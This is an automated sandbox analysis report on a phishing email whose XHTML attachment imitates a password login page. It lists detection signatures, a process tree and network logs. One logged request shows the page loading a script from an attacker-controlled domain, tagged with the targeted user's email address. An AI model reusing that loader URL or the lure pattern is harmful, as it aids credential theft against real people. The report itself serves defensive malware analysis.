Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
phish_alert_sp2_2.0.0.0.eml

Overview

General Information

Sample name:phish_alert_sp2_2.0.0.0.eml
Analysis ID:1649481
MD5:bb962929c157350d540d994b955e1a71
SHA1:f71415ca3b1f323eb8defeb1e70ac0349f7159c3
SHA256:d7a7449713fba2570d6b4c1170e32b2bc075bf974a1d63b021b279c25ab8aebc
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish10
AI detected suspicious Javascript
AI detected suspicious elements in Email content
AI detected suspicious elements in Email header
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
Invalid 'forgot password' link found
No HTML title found
None HTTPS page querying sensitive user data (password, username or email)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores large binary data to the registry

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6960 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_sp2_2.0.0.0.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6728 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "93F44844-EB21-4753-9204-F187D6997DD0" "05C9278A-EE27-4255-AC20-615C478E8326" "6960" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 4784 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\GOGNBZ4K\Play_VM-NowVWAV.xhtml MD5: E81F54E6C1129887AEA47E7D092680BF)
      • chrome.exe (PID: 1872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,740971170402014569,13365683577159135004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

      Sigma Signatures

      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6960, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
      Source: Registry Key setAuthor: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\GOGNBZ4K\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6960, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      • Phishing
      • Compliance
      • Software Vulnerabilities
      • Networking
      • System Summary
      • Hooking and other Techniques for Hiding and Protection
      • Malware Analysis System Evasion
      • Language, Device and Operating System Detection

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: Yara matchFile source: 0.2.pages.csv, type: HTML
      Source: Yara matchFile source: 0.4.pages.csv, type: HTML
      Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/AppData/Local/Microsoft/Wi... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script creates an iframe, writes HTML content to it, and then loads an external script from a suspicious domain. This behavior is highly suspicious and indicates potential malicious intent, such as credential theft or other types of attacks.
      Source: EmailJoe Sandbox AI: Detected potential phishing email: Suspicious subject line with random hexadecimal string and impossible duration (92 minutes). Empty email body with only attachments suggests malicious intent. Attachments with generic/suspicious names ('letter.png' and 'Play_VM-Now') typical of malware delivery
      Source: EmailJoe Sandbox AI: Detected suspicious elements in Email header: Email claims to be from infolineinc.com but is sent from localhost (127.0.0.1). Suspicious IP address (45.59.104.148) doesn't match the claimed sending domain. Unusual boundary string pattern in content-type header that could indicate malware. Mismatch between the message origination (localhost) and the claimed corporate sender. Despite low SCL and BCL scores, the combination of localhost sending and IP mismatch strongly suggests spoofing. The x-forefront-antispam-report shows multiple suspicious category flags
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: Number of links: 0
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: Invalid link: Forgot Password?
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: HTML title missing
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: HTML title missing
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: Has password / email / username input fields
      Source: EmailClassification: Lure-Based Attack
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: <input type="password" .../> found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/GOGNBZ4K/Play_VM-NowVWAV.xhtmlHTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.17:49783 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.17:49785 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.17:49803 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.130.137:443 -> 192.168.2.17:49827 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.17:49839 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.17:49836 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.17:49835 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.17:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.44.193:443 -> 192.168.2.17:49846 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49869 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 1MB later: 39MB
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.41
      Source: global trafficHTTP traffic detected: GET /rules/rule120600v5s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /fuk/xls/f1u2k.js?uid=jmall@murexltd.com HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
